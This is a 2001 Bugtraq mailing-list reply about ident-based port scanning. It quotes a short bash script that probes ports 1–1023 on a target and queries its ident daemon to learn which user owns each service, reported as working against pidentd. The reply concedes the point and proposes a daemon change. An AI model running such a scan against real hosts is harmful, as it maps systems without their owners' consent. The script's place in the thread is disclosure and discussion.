[18456] in bugtraq
Re: analysis of auditable port scanning techniques
daemon@ATHENA.MIT.EDU (Dan Harkless)
Mon Jan 8 12:49:13 2001
Message-ID: <200101061043.CAA22576@dilvish.speed.net>
Date: Sat, 6 Jan 2001 02:43:57 -0800
Reply-To: Dan Harkless <dan-bugtraq@DILVISH.SPEED.NET>
From: Dan Harkless <dan-bugtraq@DILVISH.SPEED.NET>
X-To: Rainer Weikusat <weikusat@mail.uni-mainz.de>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: Message from Rainer Weikusat <weikusat@mail.uni-mainz.de> of "06
Jan 2001 10:50:31 +0100."
<87ae95102g.fsf@winter.inter-i.uni-mainz.de>
Rainer Weikusat <weikusat@mail.uni-mainz.de> writes:
> Dan Harkless <dan-bugtraq@DILVISH.SPEED.NET> writes:
> > > Using this grammar applied to the data we send to an arbitrary host piped
> > > to the ident/auth port will reveal the process owner running on a given
> > > port, even though we initiated the connection.
> >
> > Uh, no. With properly-written ident daemons, such as pidentd,
> -------------
> #!/bin/bash
> #
>
> if [ "$1" != sub ];
> then
> export HOST=$(host $1 | awk '{ print $3; }')
> declare -i I=1
> export PPPID=$$
>
> while [ $I -lt 1024 ];
> do
> (
> export I
> socket -r -p "$0 sub" $HOST $I 2>/dev/null
> )
>
> I=$(($I + 1))
> done
> else
> LOCAL=$(netstat -n | grep ":.\+$HOST:$I.\+EST"|awk '{print $4;}'| cut -d: -f2)
> echo "$I,$LOCAL" | nc -w 1 $HOST auth >/proc/$PPPID/fd/1
> kill $PPID
> fi
> -------------
>
> Just hacked up. Works wonderfully against pidentd 3.0.7-3 (Debian).
Thanks to those who corrected me on this. I did test my understanding
before posting, and I couldn't get my pidentd to respond for connections
that didn't originate on its machine, but obviously I was doing something
wrong (not sure what). A re-test just now reveals that indeed it will
respond correctly for connections not originating on the machine it's
running on.
Well, there's a feature request for auth/ident/tap daemons running on OSes
(if any) that can distinguish after-the-fact between connections that
originated locally and those that originated remotely. Assuming that
doesn't break RFCs 931 / 1413, of course (I'd re-read them right now to
check, if I had the time)...
----------------------------------------------------------------------
Dan Harkless | To prevent SPAM contamination, please
dan-bugtraq@dilvish.speed.net | do not mention this private email
SpeedGate Communications, Inc. | address in Usenet posts. Thank you.
